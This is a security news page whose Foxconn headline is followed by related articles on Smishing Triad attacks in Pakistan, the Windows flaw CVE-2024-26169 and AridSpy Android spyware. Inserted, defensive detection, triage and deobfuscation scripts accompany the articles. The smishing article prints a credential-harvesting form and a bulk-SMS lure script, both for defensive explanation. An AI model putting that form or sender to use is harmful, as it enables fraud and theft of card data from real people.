
LockBit

Foxconn

Ransomware


Foxconn hit by a ransomware attack disrupting its production in Mexico

Foxconn confirmed a ransomware attack on its production facility in Mexico, while LockBit claimed responsibility and demanded a ransom…

02-Jun-2022
3 min read

Related Articles


Trojan

Scam

Discover how the Smishing Triad's latest scheme targets Pakistan Post, exploitin...

A new wave of cybercrime has struck Pakistan as the notorious Smishing Triad expands its reach. The group's latest campaign targets mobile users by impersonating Pakistan Post to steal personal and financial information. Leveraging data from Pakistan's recent breaches and well-practised smishing tactics, the campaign marks a significant escalation in the group's global operations. Messages reach Pakistan Post customers via iMessage and SMS. Previously, the group targeted users in the USA, EU, UAE, and KSA.

### Key Campaigns Documented

- **UAE Federal Authority Impersonation**: During holidays, the Triad targeted UAE residents by impersonating the UAE Federal Authority for Identity and Citizenship.
- **Emirates Post Smishing**: This campaign impersonated Emirates Post to deceive UAE residents.
- **USPS Smishing**: Targeted US residents by impersonating the United States Postal Service (USPS).

![def80fc6eb0b3abf1ea0605333789490.png](https://sb-cms.s3.ap-south-1.amazonaws.com/def80fc6eb0b3abf1ea0605333789490_69330de27a.png)

***Data Trail (resecurity)***

## Tactical Analysis

### Message Distribution and Delivery Mechanism

The [Smishing Triad](https://www.resecurity.com/blog/article/smishing-triad-is-targeting-pakistan-to-defraud-banking-customers-at-scale) sends 50,000–100,000 malicious messages daily. Targeting is driven by databases of stolen personal data, often bought on the dark web, that contain phone numbers and other personal information. In Pakistan, the Triad has targeted customers of the major mobile carriers Jazz/Warid, Zong, Telenor Pakistan, and Ufone.

![a900a7a910364a6ba3a9a15524e32886.jpeg](https://sb-cms.s3.ap-south-1.amazonaws.com/a900a7a910364a6ba3a9a15524e32886_29fb47afb0.jpeg)

***iOS Message Distribution (resecurity)***

### Attack Vectors and Techniques

#### Malicious Messaging

The primary vector is an SMS or iMessage that appears to come from Pakistan Post. The message typically informs the recipient of a failed package delivery and prompts them to update their address via a link.

#### Fake Websites

Clicking the link redirects the user to a fake website resembling Pakistan Post's official site. The site asks for personal and financial details, ostensibly to cover a redelivery fee.

### Smishing Kits and Technical Infrastructure

#### Smishing Kit Code and Templates

The smishing kits used by the Triad reuse the same code and templates across campaigns and are automated for large-scale distribution. The form below is an illustrative reconstruction of the harvesting page; the domain is a placeholder rather than an observed indicator.

```html
<!-- Illustrative harvesting form as found in the kit's template;
     "fake-pakistan-post.com" is a placeholder, not an observed indicator. -->
<form action="https://fake-pakistan-post.com/verify" method="POST">
  <label for="name">Name:</label>
  <input type="text" id="name" name="name">
  <label for="credit_card">Credit Card:</label>
  <input type="text" id="credit_card" name="credit_card">
  <button type="submit">Submit</button>
</form>
```

#### Hosting and Domain Usage

The domains used for these campaigns are typically registered through services that hide registrant details. Examples include:

- **ep-gov-ppk.cyou**
- **pk-post-goi.xyz**

These domains are often registered via NameSilo, LLC, and the operators place URL shorteners in front of them so the landing domain is not visible in the message itself.

![97b65b14a782c9d971acce38a118ff0f.png](https://sb-cms.s3.ap-south-1.amazonaws.com/97b65b14a782c9d971acce38a118ff0f_00bd770e60.png)

***Phishing page (resecurity)***

### Automation Tools

To process the stolen data at scale, the Triad uses automation tools that craft and send large volumes of smishing messages. The script below is an illustrative reconstruction of that bulk-sending workflow; the gateway URL is a placeholder.

```python
import requests

# Illustrative reconstruction of the Triad's bulk-sending workflow.
# "sms-gateway.com" is a placeholder, not an observed indicator.
GATEWAY_URL = "https://sms-gateway.com/send"


def send_sms(phone_number, message):
    """Submit one message to the bulk SMS gateway and return the HTTP status code."""
    payload = {"to": phone_number, "text": message}
    response = requests.post(GATEWAY_URL, data=payload, timeout=10)
    return response.status_code


# Target numbers are taken from stolen subscriber databases.
phone_numbers = ["+923361021455", "+923301956704", "+923315640313"]
# The lure: a failed-delivery notice pointing at the kit's landing domain.
message = "Your package delivery failed. Update your address at https://pk-post-goi.xyz"

for number in phone_numbers:
    send_sms(number, message)
```

## Mitigation and Prevention

### Telecom Operator Actions

Telecom operators must strengthen their fraud detection systems. Proactive measures include:

- **Real-time message filtering**: Detect and block messages that combine delivery-failure lures with shortened or lookalike postal URLs.
- **User alerts**: Inform subscribers about the campaign and provide guidance on identifying fraudulent messages.

### National Cyber Emergency Response Team (PKCERT)

PKCERT has issued [advisories](https://pkcert.gov.pk/wp-content/uploads/2024/05/Advisory-24-11.pdf) describing the patterns of this smishing activity. They urge citizens to:

- **Verify sources**: Confirm any message claiming to be from Pakistan Post through official channels.
- **Avoid clicking links**: Do not click on links in unknown or suspicious messages.

## Attribution and Broader Context

### Chinese-Speaking Threat Actors

The Smishing Triad is believed to consist of Chinese-speaking cybercriminals. Their activity matches patterns previously observed in other regions: impersonating postal services and seeding campaigns with dark web data.

### Cross-Regional Activity

The expansion to Pakistan is part of a broader strategy. Previous campaigns in the EU and the UAE used the same methods against the same kind of targets.

### Indicators of Compromise (IOCs)

Resecurity has published the following IOCs to aid in identifying and mitigating these threats:

- **Domains**:
  - ep-gov-ppk.cyou
  - pk-post-goi.xyz
- **URLs**:
  - l.ead.me/bf6fB8
  - is.gd/bpEPk3
- **Phone Numbers**:
  - +923361021455
  - +923301956704
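The filtering an operator or SOC would run against inbound SMS, as an added example that is not part of the original article or Resecurity's tooling: it scores a message on the delivery-failure lure, the presence of a URL shortener, the published IOC domains and URLs, and postal-themed lookalike hosts. The sample messages are constructed; the IOC values are the ones listed above; `pakpost.gov.pk` as Pakistan Post's legitimate domain, the shortener list and the threshold of 3 are assumptions to tune locally.

```python
import re
from urllib.parse import urlparse

# Constructed sample messages: two carry IOC URLs from the article, two are benign.
SAMPLE_MESSAGES = [
    "Your package delivery failed. Update your address at https://pk-post-goi.xyz",
    "Pakistan Post: parcel held at depot, confirm details https://is.gd/bpEPk3",
    "Your OTP for Jazz Cash is 482913. Do not share it with anyone.",
    "Reminder: your appointment is tomorrow at 10am. Details: https://example.org/visit",
]

# Indicators taken from the article's IOC section.
IOC_DOMAINS = {"ep-gov-ppk.cyou", "pk-post-goi.xyz"}
IOC_URLS = {"l.ead.me/bf6fB8", "is.gd/bpEPk3"}

# Generic signals (assumed lists): shorteners hide the landing domain, delivery-failure
# wording is the Triad's standard pretext, and cheap TLDs recur in the kit's domains.
SHORTENER_HOSTS = {"is.gd", "l.ead.me", "bit.ly", "tinyurl.com"}
SUSPECT_TLDS = {"cyou", "xyz", "top", "icu"}
LEGIT_POSTAL_DOMAIN = "pakpost.gov.pk"  # assumed legitimate Pakistan Post domain
LURE_PATTERNS = [
    r"\bdeliver(y|ed)?\b.*\b(fail|unsuccessful|held|pending)",
    r"\b(update|confirm)\b.*\b(address|details)\b",
    r"\bredeliver(y)?\b",
]
URL_RE = re.compile(r"https?://[^\s]+")


def extract_urls(text):
    """Return every http(s) URL in the message body, case preserved."""
    return URL_RE.findall(text)


def score_message(text):
    """Score one message; returns (score, reasons). A score of 3 or more is smishing."""
    score, reasons = 0, []
    lowered = text.lower()
    for pattern in LURE_PATTERNS:          # one point for the pretext, counted once
        if re.search(pattern, lowered):
            score += 1
            reasons.append(f"lure:{pattern}")
            break
    for url in extract_urls(text):         # URLs are matched case-sensitively
        parsed = urlparse(url)
        host = parsed.hostname or ""
        if host in IOC_DOMAINS or f"{host}{parsed.path}" in IOC_URLS:
            score += 3                      # a known indicator is decisive on its own
            reasons.append(f"ioc:{host}{parsed.path}")
        if host in SHORTENER_HOSTS:
            score += 1
            reasons.append(f"shortener:{host}")
        if host.rsplit(".", 1)[-1] in SUSPECT_TLDS:
            score += 1
            reasons.append(f"tld:{host}")
        if "post" in host and not host.endswith(LEGIT_POSTAL_DOMAIN):
            score += 1                      # postal branding on a non-postal host
            reasons.append(f"postal-lookalike:{host}")
    return score, reasons


def classify(messages, threshold=3):
    """Map each message to True (block/alert) or False (deliver)."""
    return {m: score_message(m)[0] >= threshold for m in messages}


if __name__ == "__main__":
    for msg, verdict in classify(SAMPLE_MESSAGES).items():
        print("BLOCK " if verdict else "ALLOW ", score_message(msg), msg[:60])
```

Matching the IOC URL path exactly (`is.gd/bpEPk3`) matters because shorteners host millions of benign links; the shortener host alone only adds one point, so a legitimate shortened link without the lure or a suspect landing domain stays under the threshold.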

15-Jun-2024
4 min read

Zero Day

Black Basta

CISA issues urgent alert on Windows vulnerability CVE-2024-26169 exploited by ra...

On March 12, 2024, Microsoft addressed a high-severity vulnerability, CVE-2024-26169, in its monthly Patch Tuesday updates. The flaw, an improper privilege management weakness in the Windows Error Reporting service, has been actively exploited by ransomware groups, most notably the Black Basta gang. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has since added it to its catalog of actively exploited vulnerabilities, urging immediate action.

## Understanding CVE-2024-26169

### Technical Overview

CVE-2024-26169 is a high-severity elevation-of-privilege flaw caused by improper privilege management in the Windows Error Reporting service. It allows a local attacker who already has code execution on the host to gain SYSTEM privileges through a low-complexity attack that requires no user interaction. Such vulnerabilities are dangerous because they turn any foothold (a phished user, a web shell, a compromised service account) into full control of the machine: the attacker can execute arbitrary code, install programs, view, change or delete data, or create new accounts with full user rights.

![Img1.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Img1_c7ac13f9a5.jpg)

***Sample instance code illustrating a potential exploit scenario***

This sample code highlights the type of manipulation that could be performed using elevated privileges obtained through this vulnerability.

### Exploitation and Timeline

Symantec security researchers discovered that the Black Basta ransomware gang (also tracked as the Cardinal cybercrime group) exploited this vulnerability. Two builds of the exploit tool were recovered: one with a compilation timestamp of December 18, 2023, and a second compiled on February 27, 2024. Taken at face value, the earlier timestamp means the group had a working exploit at least 85 days before Microsoft released a patch. Compilation timestamps can be tampered with, but Symantec considers the evidence reliable. Early possession of the exploit by Black Basta is a considerable threat given the group's history of targeting high-profile organizations.

- **December 18, 2023:** Earliest known compilation of the exploit.
- **February 27, 2024:** Second compilation of the exploit.
- **March 12, 2024:** Microsoft releases Patch Tuesday updates addressing the vulnerability.
- **May 2024:** Symantec publishes findings linking Black Basta to the exploitation.

## Impact and Risks

### Affected Entities

Black Basta, active since April 2022, has a track record of breaching significant entities, including government contractors, healthcare providers, and critical infrastructure operators. Notable victims include:

- Rheinmetall (German defense contractor)
- Capita (UK technology outsourcing company)
- Toronto Public Library
- American Dental Association
- ABB (Swiss industrial engineering group)
- Hyundai's European division
- Yellow Pages Canada
- Ascension (US healthcare giant)

Exploiting CVE-2024-26169 lets the group move from an initial foothold to full control of a host with minimal effort, bypassing controls that assume the intruder is a low-privileged user.

### System Compromise and Damage Potential

The SYSTEM-level access provided by CVE-2024-26169 allows attackers to:

- Execute arbitrary code
- Install malware, including the ransomware payload itself
- Modify, encrypt or delete data
- Create new user accounts with full privileges

In a ransomware intrusion this translates directly into encrypted data, disrupted operations and a ransom demand. The financial and operational impact on affected organizations can be devastating, often leading to loss of business, reputational damage, and significant recovery costs.

### Federal Directives and Response

In response to the exploitation, CISA added the flaw to its catalog and set a deadline of July 4, 2024 for Federal Civilian Executive Branch (FCEB) agencies to secure their systems. The directive binds only federal agencies, but CISA strongly urges all organizations to prioritize fixing this flaw.

## Defensive Measures and Mitigation

### Immediate Actions

Apply the March 2024 Patch Tuesday updates from Microsoft. These updates fix CVE-2024-26169 and close the exploit path.

### System Hardening

Beyond patching, organizations should implement system hardening measures, including:

1. **Privilege Management**: Limit user privileges to the minimum necessary for each role, and enforce policies for granting and reviewing elevated privileges. A local privilege escalation is only useful to an attacker who first lands on the host, so fewer and shorter-lived admin rights shrink what the exploit can reach.
2. **Monitoring and Detection**: Deploy monitoring that flags unusual activity consistent with exploitation attempts, such as unexpected processes spawned with SYSTEM privileges.
3. **Endpoint Protection**: Use endpoint protection capable of identifying and blocking the post-exploitation tooling ransomware crews deploy after escalating.

### Long-term Strategies

Organizations should adopt a multi-layered security approach to improve resilience against vulnerabilities of this kind. Key strategies include:

- **Regular Security Audits**: Conduct frequent security assessments to identify and address vulnerabilities.
- **Employee Training**: Train employees on security best practices and phishing awareness to reduce the risk of the social engineering that typically provides the initial foothold.
- **Incident Response Planning**: Develop and regularly update incident response plans to ensure swift and effective responses to security breaches.

### Instance of Mitigation

Below is a PowerShell script to check that the Windows Error Reporting service is properly configured and that the update is installed:

![Img2.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Img2_3ed7363bda.jpg)

***Verify and update Windows Error Reporting service***

This script checks that the update addressing CVE-2024-26169 is applied, mitigating the risk of exploitation. The addition of CVE-2024-26169 to CISA's catalog of actively exploited vulnerabilities underscores the severity of this flaw. The swift action required of federal agencies and recommended for all organizations reflects the threat posed by ransomware groups like Black Basta.
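How a team would act on the CISA catalog entry in practice, as an added example that is not part of the original article or CISA's tooling: triage a KEV-shaped feed against an asset inventory so that overdue entries, then ransomware-linked entries, then the nearest due dates come first. The feed excerpt is constructed with the real field names; the July 4, 2024 due date is the one quoted above, while the `dateAdded`, the two placeholder CVE entries and the inventory are assumptions.

```python
from datetime import date

# Constructed excerpt in the shape of CISA's KEV JSON feed (real field names).
# The CVE-2024-26169 due date is from the article; its dateAdded and the two
# other entries are placeholders, and CVE-2024-9990x are not real CVE IDs.
KEV_SAMPLE = {
    "vulnerabilities": [
        {
            "cveID": "CVE-2024-26169",
            "vendorProject": "Microsoft",
            "product": "Windows",
            "vulnerabilityName": "Windows Error Reporting Service improper privilege management",
            "dateAdded": "2024-06-13",
            "dueDate": "2024-07-04",
            "knownRansomwareCampaignUse": "Known",
        },
        {
            "cveID": "CVE-2024-99901",  # placeholder entry
            "vendorProject": "Microsoft",
            "product": "Windows",
            "vulnerabilityName": "Placeholder Windows vulnerability",
            "dateAdded": "2024-05-30",
            "dueDate": "2024-06-20",
            "knownRansomwareCampaignUse": "Unknown",
        },
        {
            "cveID": "CVE-2024-99902",  # placeholder entry for a product we do not run
            "vendorProject": "Example Corp",
            "product": "Widget Server",
            "vulnerabilityName": "Placeholder vulnerability",
            "dateAdded": "2024-06-10",
            "dueDate": "2024-07-01",
            "knownRansomwareCampaignUse": "Known",
        },
    ]
}

# (vendorProject, product) pairs present in our asset inventory; assumed.
INVENTORY = {("Microsoft", "Windows")}


def parse_entries(feed):
    """Yield the fields needed for triage from a KEV-shaped feed."""
    for v in feed["vulnerabilities"]:
        yield {
            "cve": v["cveID"],
            "vendor": v["vendorProject"],
            "product": v["product"],
            "due": date.fromisoformat(v["dueDate"]),
            "ransomware": v.get("knownRansomwareCampaignUse") == "Known",
        }


def triage(feed, inventory, today):
    """Return KEV entries that affect `inventory`, most urgent first.

    `today` is a date or an ISO date string. Ordering: entries already past
    their due date, then entries with known ransomware use, then nearest due
    date. Entries for products not in the inventory are dropped.
    """
    if isinstance(today, str):
        today = date.fromisoformat(today)
    rows = []
    for e in parse_entries(feed):
        if (e["vendor"], e["product"]) not in inventory:
            continue
        days_left = (e["due"] - today).days
        rows.append({**e, "days_left": days_left, "overdue": days_left < 0})
    # Tuple of booleans sorts False before True, so negate to put hits first.
    rows.sort(key=lambda r: (not r["overdue"], not r["ransomware"], r["due"]))
    return rows


if __name__ == "__main__":
    for r in triage(KEV_SAMPLE, INVENTORY, "2024-06-14"):
        status = "OVERDUE" if r["overdue"] else f"{r['days_left']} days left"
        print(f"{r['cve']:16} ransomware={r['ransomware']!s:5} {status}")
```

Run against the live feed, the same function gives a daily list that puts CVE-2024-26169 ahead of entries with an earlier deadline but no known ransomware use, which matches how the article argues the flaw should be prioritized.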

14-Jun-2024
5 min read

APT

Arid Viper's AridSpy malware targets Android users in Palestine & Egypt. This mu...

Arid Viper, also known as APT-C-23, Desert Falcons, or Two-tailed Scorpion, has been an active cyberespionage group since at least 2013. The group primarily targets Middle Eastern countries and has recently intensified its mobile espionage efforts, particularly against Android users in Egypt and Palestine. SecureBlink threat researchers have analyzed five ongoing campaigns that employ a multistage Android spyware called AridSpy. This analysis dissects the technical details, methodology, and implications of these campaigns.

---

### **Campaign Overview**

The five identified campaigns distribute AridSpy via dedicated websites impersonating legitimate applications: several messaging apps, a job opportunity app, and a Palestinian Civil Registry app. SecureBlink's telemetry detected six occurrences of AridSpy in Palestine and Egypt, consistent with targeted espionage rather than mass distribution.

### **Distribution Mechanism**

AridSpy is distributed through fake but functional Android applications. Victims are lured into downloading these apps from third-party websites; none of them are available on the Google Play Store. The distribution websites identified include:

- lapizachat[.]com
- reblychat[.]com
- nortirchats[.]com
- pariberychat[.]com (inactive)
- renatchat[.]com (inactive)

### **Technical Nuances of AridSpy**

1. **Initial Access and Installation**

   A JavaScript file named `myScript.js`, hosted on the same server as the download page, generates the download path for the malicious app: it performs an AJAX request to `api.php` on the server, which returns a specific file directory and name. The downloaded application installs and behaves like the legitimate app it imitates but embeds the first stage of AridSpy. That stage focuses on avoiding detection by security software and establishing initial communication with the command and control (C&C) server.

2. **Multistage Payload Delivery**

   Unlike its earlier single-stage version, AridSpy now operates as a multistage trojan. The initial app acts as a conduit that downloads and installs additional payloads from the C&C server, which helps it evade detection and persist.

   - **First-Stage Payload:** An AES-encrypted file downloaded from a hardcoded URL. It is decrypted with a hardcoded key, and the victim is prompted to install it manually; it masquerades as a Google Play services update. Once installed, it operates independently of the initial app.
   - **Second-Stage Payload:** Named `prefLog.dex`, it contains the main espionage functionality. It is dynamically loaded and executed by the first-stage payload, establishes a persistent connection with the C&C server, and waits for commands while exfiltrating data.

### **Functional Analysis**

1. **Data Exfiltration**

   The primary goal of AridSpy is to exfiltrate sensitive user data. The malware can:

   - Capture images using the device's camera.
   - Record audio from the microphone.
   - Access and upload contact lists, SMS messages, call logs, and other personal data.
   - Monitor app usage and collect keystrokes.

   AridSpy takes care to stay inconspicuous while collecting data. For instance, it only captures images when the device screen is turned on or off, and only if the battery level is above 15% and at least 40 minutes have passed since the last capture.

2. **Command and Control Communication**

   AridSpy uses Firebase to receive commands and a separate hardcoded domain for data exfiltration. The C&C traffic is designed to blend in with normal network activity. The operators can also deactivate an implant by switching its exfiltration server to a benign-looking domain, which makes the traffic less likely to be flagged by network security controls.

3. **Obfuscation Techniques**

   AridSpy uses a trivial string obfuscation scheme in which each string is built from a character array. The scheme is consistent across all stages of the malware and adds friction to reverse engineering, since no plaintext strings appear in the decompiled code.

### **Campaigns in Detail**

1. **LapizaChat Campaign**
   - **Website:** lapizachat[.]com
   - **Description:** This campaign used a trojanized version of the legitimate StealthChat app. The malicious versions, modified on July 5th, 2023, and September 18th, 2023, included AridSpy code.
   - **Functionality:** The app provided legitimate messaging services while secretly installing AridSpy.

2. **NortirChat Campaign**
   - **Website:** nortirchats[.]com
   - **Description:** The NortirChat app, based on the legitimate Session messaging app, was modified and distributed with AridSpy code starting from March 19th, 2023.
   - **Functionality:** Like LapizaChat, it functioned as a messaging app while deploying AridSpy.

3. **ReblyChat Campaign**
   - **Website:** reblychat[.]com
   - **Description:** This campaign used a trojanized version of Voxer Walkie Talkie Messenger. The modified versions, dated June 8th, 2023, and June 11th, 2023, were distributed with AridSpy.
   - **Functionality:** It provided walkie-talkie communication features while performing espionage activities.

4. **Palestinian Civil Registry Campaign**
   - **Website:** palcivilreg[.]com
   - **Description:** This app claimed to offer information about Palestinian residents. It was advertised via a Facebook page, and the malicious app retrieved its data from the legitimate registry server.
   - **Functionality:** The app collected personal data under the guise of providing civil registry information.

5. **Job Opportunity App Campaign**
   - **Website:** almoshell[.]website
   - **Description:** This app purported to offer job opportunities. Unlike the other campaigns, it was not based on a legitimate app but was built from scratch to lure users into providing personal information.
   - **Functionality:** The app collected sensitive data during the job application process.

### **Attribution and Indicators of Compromise (IoCs)**

SecureBlink concurs with attributing AridSpy to the Arid Viper group with medium confidence. Key indicators include:

- Targeting of organizations in Palestine and Egypt, aligning with Arid Viper's historical focus.
- Use of the `myScript.js` JavaScript file across multiple campaigns, previously linked to Arid Viper.
- The distinctive distribution method and code similarities to past campaigns, such as the FIFA World Cup in Qatar campaign.

---
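The char-array string obfuscation described under Obfuscation Techniques is simple enough to undo mechanically. The script below is an added example, not code from the original analysis or from the malware: it finds `new String(new char[]{...})` expressions in decompiled Java, decodes decimal, hexadecimal and quoted-character elements, and rewrites each one as a plain string literal. The decompiled fragment is constructed for illustration; `c2.example.com` and `/api.php` in it are placeholders, while `prefLog.dex` is the second-stage name given in the article.

```python
import re

# Constructed decompiled fragment in the style of the char-array obfuscation.
# Hosts and paths are placeholders, not AridSpy indicators.
DECOMPILED_SAMPLE = r"""
public class a {
    static final String a = new String(new char[]{104, 116, 116, 112, 115, 58, 47, 47});
    static final String b = new String(new char[]{'c', '2', '.', 'e', 'x', 'a', 'm', 'p', 'l', 'e', '.', 'c', 'o', 'm'});
    static final String c = new String(new char[]{0x2f, 0x61, 0x70, 0x69, 0x2e, 0x70, 0x68, 0x70});
    static final String d = new String(new char[]{112, 114, 101, 102, 76, 111, 103, 46, 100, 101, 120});
}
"""

# Matches the whole obfuscated expression. The body alternation keeps a quoted
# '}' from ending the array early.
CHAR_ARRAY_RE = re.compile(
    r"new String\(\s*new char\[\]\s*\{((?:'(?:\\.|[^'\\])'|[^}])*)\}\s*\)"
)
# One array element: a char literal (with optional escape), a hex int, or a decimal int.
ELEMENT_RE = re.compile(r"'(\\.|[^'\\])'|0[xX][0-9a-fA-F]+|\d+")


def decode_elements(body):
    """Turn the text between the braces into the string the array encodes."""
    chars = []
    for m in ELEMENT_RE.finditer(body):
        tok = m.group(0)
        if tok.startswith("'"):
            lit = m.group(1)
            # Decompilers emit a few escapes such as '\n' or '\\'; resolve them.
            chars.append(lit.encode().decode("unicode_escape") if lit.startswith("\\") else lit)
        elif tok.lower().startswith("0x"):
            chars.append(chr(int(tok, 16)))
        else:
            chars.append(chr(int(tok)))
    return "".join(chars)


def recover_strings(source):
    """Return every char-array string in `source`, in order of appearance."""
    return [decode_elements(m.group(1)) for m in CHAR_ARRAY_RE.finditer(source)]


def deobfuscate(source):
    """Rewrite each obfuscated expression as a plain Java string literal."""
    def repl(m):
        text = decode_elements(m.group(1)).replace("\\", "\\\\").replace('"', '\\"')
        return f'"{text}"'
    return CHAR_ARRAY_RE.sub(repl, source)


if __name__ == "__main__":
    for s in recover_strings(DECOMPILED_SAMPLE):
        print(repr(s))
    print(deobfuscate(DECOMPILED_SAMPLE))
```

Running `recover_strings` over every class in a decompiled APK gives the URL fragments, file names and command keywords in one pass, which is usually enough to locate the C&C logic and the `prefLog.dex` loader without stepping through the obfuscation by hand.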

13-Jun-2024
5 min read